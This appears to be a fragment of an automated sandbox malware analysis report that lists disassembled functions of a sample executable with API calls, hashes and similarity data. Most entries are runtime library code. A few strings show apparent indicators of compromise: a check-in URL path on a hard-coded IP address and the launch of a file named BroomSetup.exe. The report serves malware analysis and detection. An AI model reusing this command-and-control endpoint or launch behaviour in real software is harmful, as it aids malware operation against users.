                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5017172706725BF273266AA5C8CC7F7E6DEAC29A031501EDF905D6100EE61ED0281B9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                  • Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC7004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,05BC25ED,05BC7307,?,05BC6FAE,00000001,00000364,?,05BBE697,?,?,?,05BBED94,?), ref: 05BC7009
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC703E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC7065
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 05BC7072
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 05BC707B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                  • Instruction ID: 6b6ed1d0d096e0b3c07b1ddeb1062277c3ef26411bea2b3bdd4595c21de0417b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2801F976740A0027873267796C88F2F2E1BFBC126172101FCF512E2280EE20A8024A6C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EE9E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEB6
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEC8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEDA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEEC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEFE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCF105 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF11D
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF12F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF141
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF153
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF165
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction ID: ac0a14b943f6e448c051cbbcd677c2fdc90d2a8c44a136070bd9ac4538adc33e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F01232918604AB8B20DFA8E8C9D2B7BDAFA0475077418DDF546D7500CB31F9814E9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC5519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC5537
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC5549
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC555C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC556D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC557E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: 5c0f65c21486ec15973545acc6382990afab5d075ba5735a809faa8aa649047a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F017B19112208BCB266F5CFCC5A153F61FB0462032171FEF509A2278CB366A818FCE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2895899722
                                                                                                                                                                                                                                  • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041D851 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                    • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                    • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                    • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCDAB8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 05BCDB07
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCDC24
                                                                                                                                                                                                                                    • Part of subcall function 05BC0B99: IsProcessorFeaturePresent.KERNEL32(00000017,05BC0B6B,00000016,05BC2DA0,0000002C,00439740,05BCD634,?,?,?,05BC0B78,00000000,00000000,00000000,00000000,00000000), ref: 05BC0B9B
                                                                                                                                                                                                                                    • Part of subcall function 05BC0B99: GetCurrentProcess.KERNEL32(C0000417,05BC2DA0,00000016,05BC7003), ref: 05BC0BBD
                                                                                                                                                                                                                                    • Part of subcall function 05BC0B99: TerminateProcess.KERNEL32(00000000), ref: 05BC0BC4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction ID: 55b0e4138f0ad74e6d57e7bba3b2126b2d1744414ce4dce2b7869ee2cd5d4b98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40514F75E0025AAFDF14DFA8C884ABEFBB5FF48210F2441EDD455E7340E675AA018B54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-36620197
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe,00000104), ref: 05BC356A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC3635
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC363F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-36620197
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: eb8cb38689687a4c717ec2de69d823cf5eb16753d764e8b43331a1ba2a73bb62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53319371A44258AFDB21DF999C84DAEBFFDEB84710F5084FEE40597210D770AA40CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040356F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB37D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: 609228d4b04ee4f9b43ba3d07a5638d0f6f990607dea64742787040429ffe720
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E018772A05515ABEB05DF989C44BFEB7A8FF48610F10056AE809E3240E7F4AA408AA1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD64C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 05BD6509
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 05BD651D
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 05BD6526
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                  • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                  • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                  • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction ID: 3ec88795a5a94b3fcba3612418688929bc3a93c9ff0df9d7dfc3d7104c8d530e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E017C71E0021CEBDB25DF69E9449EDBFB9FF08650F00812AF805A6160EB709A45CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
